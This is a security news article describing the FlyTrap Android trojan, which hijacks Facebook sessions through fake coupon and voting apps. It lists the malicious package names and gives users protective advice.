Facebook accounts hijacked by Android malware “FlyTrap”

New malware campaign targets Facebook users on mobile

Flytrap infects AndroidsThe new Trojan virus has been in action since March targeting Android users

Zimperium’s zLabs mobile threat research team released a report[1] about a new Trojan virus[2] called “FlyTrap” operating since March 2021 with over 10,000 victims across 144 countries spreading by social media hijacking and third-party app stores. This Trojan uses social engineering[3] tricks to compromise personal “Facebook” accounts. Previously undetected, the hijacking campaign is performed by malicious parties in Vietnam.

The targeted domain, “Facebook,” is a popular social media platform. The accounts can be used in many different ways, like increasing the reach of pages spreading false information or political propaganda. Hackers can publish posts from stolen accounts spreading the malware further and infecting their “Facebook” friends and so on.[4]

Initially, these malicious applications were distributed through Google Play and third-party applications stores. After the investigation reached Google, it verified the research and removed malicious applications from the Google Play store, but they are still available on unsecured app stores.

Some of the malicious applications containing the Trojan include:

  • com.luxcarad.cardid: GG Voucher
  • com.gardenguides.plantingfree: Vote European Football
  • com.free_coupon.gg_free_coupon: GG Coupon Ads
  • com.m_application.app_moi_6: GG Voucher Ads
  • com.free.voucher: GG Voucher
  • com.ynsuper.chatfuel: Chatfuel
  • Com.free_coupon.net_coupon: Net Coupon
  • com.movie.net_coupon: Net Coupon
  • com.euro2021: EURO 2021 Official

Threat actors used human vulnerabilities and “acting before thinking about it” mindset with apps offering free “Netflix,” “AdWords” coupon codes, and voting for football teams or players. Their high-quality designs and engaging nature minimized suspicion of malicious intent.

Tricks used by FlyTrap to infect users

Generally, Trojans come looking like a legitimate program when in fact, they are fake versions of the app containing malicious code intended to do harm. This form of Trojan targets Android devices specifically to steal information from their social media platforms.

Upon downloading the app, users need to log into their “Facebook” accounts to redeem coupon codes. When they press the “Continue with Facebook” button, FlyTrap uses JavaScript injection to hijack sessions by logging into the original and legitimate domain. The fake apps open the legitimate “Facebook” URL in a WebView and inject the malicious JavaScript code that enables it to extract the targeted information.

After logging into their “Facebook” account through a fake window, users' Facebook ID, location, email address, IP address, cookies associated with the Facebook account get stolen by cybercriminals. ZLabs researchers said:

These hijacked Facebook sessions can be used to spread the malware by abusing the victim’s social credibility through personal messaging with links to the Trojan, as well as propagating propaganda or disinformation campaigns using the victim’s geolocation details. These social engineering techniques are highly effective in the digitally connected world and are used often by cybercriminals to spread malware from one victim to another.

After logging in and expecting a free coupon code, users were disappointed. To justify not providing the fake coupon code and make it look more believable, threat actors decided to display a message stating that “Coupon expired after redemption and before spending.”

The Command & Control server makes use of login credentials for authorizing access to the harvested data. The experts also found a flaw in the authentication process to the C2 server that allowed them to access the collected session cookies.

Protect your device and information from malware

There are steps you can take to protect yourself from Trojans like “FlyTrap”. Disallowing installation of any app from an untrusted source is turned off by default on most Android devices. To reduce the risk of downloading an app from an untrusted source, you should turn this setting on. To disable unknown sources on Android, you can go to settings, choose “security,” and ensure that the “unknown sources” option is not selected.

Multi-factor authentication (MFA) can be a great layer of security for all social media accounts to limit access to sensitive and private data. This will provide geo-based alerts to the user's profile and warn if someone is trying to log into their account from another location. If you suspect that your “Facebook” account has been compromised, you should follow “Facebook” instructions to log out of all accounts on all devices, change passwords and enable MFA.

Be aware of what the application asks for; think if the deal could be too good to be true. Think of how and why the application is asking you to log into your social media. Find the Terms of Use, the Privacy policy and read through them. Figure out how your information is going to be used and if you want to grant permission. Once you enter your data, you cannot take it back.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions